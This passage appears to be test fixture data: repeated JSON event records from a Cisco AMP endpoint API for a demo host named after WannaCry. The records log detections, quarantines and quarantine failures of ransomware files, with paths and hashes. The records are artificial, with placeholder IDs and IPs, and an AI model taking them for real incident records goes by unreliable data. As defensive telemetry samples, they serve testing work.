pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_n